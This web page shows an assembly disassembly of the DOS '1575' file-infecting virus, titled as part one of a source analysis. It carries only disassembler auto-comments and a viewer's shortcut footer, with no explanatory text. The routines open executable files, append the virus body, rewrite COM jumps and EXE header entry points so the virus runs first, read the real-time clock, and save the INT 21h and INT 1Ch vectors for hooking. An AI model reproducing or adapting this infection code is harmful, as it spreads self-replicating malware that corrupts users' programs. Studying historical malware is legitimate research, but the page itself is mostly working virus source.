📄 1575病毒源程序分析(1) .txt
字号:
clc ; Clear carry flag
retn
db 0CDh, 20h
loc_10:
cmp ax,22Dh
je loc_11 ; Jump if equal
push ds
pop es
push cs
pop ds
mov ax,data_26
mov ss,ax
xchg bp,sp
mov si,13Ch
mov di,0
mov cx,10h
cld ; Clear direction
repne movsb ; Rep while cx>0 Mov [si] to es:[di]
jmp loc_3 ; (018C)
sub_1 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_3 proc near
loc_11:
mov al,43h ; 'C'
mov ds:data_7e,al
mov al,8
out 70h,al ; port 70h, RTC addr/enabl NMI
; al = 8, month register
in al,71h ; port 71h, RTC clock/RAM data
mov ds:data_4e,al
mov dx,219h
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_12 ; Jump if carry=0
retn
loc_12:
mov ds:data_1e,ax
mov dx,10Bh
mov bx,ds:data_1e
mov cx,0Ch
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
push ax
add ax,10h
and ax,0FFF0h
push ax
shr ax,1 ; Shift w/zeros fill
shr ax,1 ; Shift w/zeros fill
shr ax,1 ; Shift w/zeros fill
shr ax,1 ; Shift w/zeros fill
mov di,31Fh
stosw ; Store ax to es:[di]
pop ax
pop bx
sub ax,bx
mov cx,627h
add cx,ax
mov dx,100h
sub dx,ax
mov bx,ds:data_1e
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov bx,ds:data_1e
mov cx,0Ch
mov dx,31Bh
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,3Eh ; '>'
mov bx,ds:data_1e
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
retn
sub_3 endp
db 0Eh, 8Ch, 0C8h, 5, 1, 0
db 50h, 0B8h, 0, 1, 50h, 0CBh
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_4 proc near
mov al,45h ; 'E'
mov byte ptr ds:[724h],al
mov al,8
out 70h,al ; port 70h, RTC addr/enabl NMI
; al = 8, month register
in al,71h ; port 71h, RTC clock/RAM data
mov data_34,al
mov dx,219h
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_13 ; Jump if carry=0
retn
loc_13:
mov data_26,ax
mov dx,10Bh
mov bx,data_26
mov cx,18h
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
push ax
add ax,10h
adc dx,0
and ax,0FFF0h
mov data_24,dx
mov data_25,ax
mov cx,727h
sub cx,100h
add ax,cx
adc dx,0
mov cx,200h
div cx ; ax,dx rem=dx:ax/reg
inc ax
mov data_16,ax
mov data_15,dx
mov ax,data_21
mov data_22,ax
mov ax,data_20
mov data_23,ax
mov ax,data_18
mov data_29,ax
mov ax,data_19
mov data_30,ax
mov dx,data_24
mov ax,data_25
mov cx,10h
div cx ; ax,dx rem=dx:ax/reg
sub ax,10h
sub ax,data_17
mov data_21,ax
mov data_18,ax
mov data_20,100h
mov data_19,100h
mov ax,4200h
xor cx,cx ; Zero register
mov dx,2
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,10Dh
mov bx,data_26
mov cx,16h
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,100h
mov ax,data_25
pop cx
sub ax,cx
sub dx,ax
mov cx,727h
add cx,ax
sub cx,100h
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
retn
sub_4 endp
db 51h, 0B9h, 0, 0, 0B4h, 4Eh
db 0CDh, 21h, 59h, 0C3h
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_5 proc near
push es
mov ax,351Ch
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_13,bx
mov cs:data_14,es
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
push es
pop ax
mov cs:data_12,ax
mov cs:data_11,bx
pop es
retn
sub_5 endp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -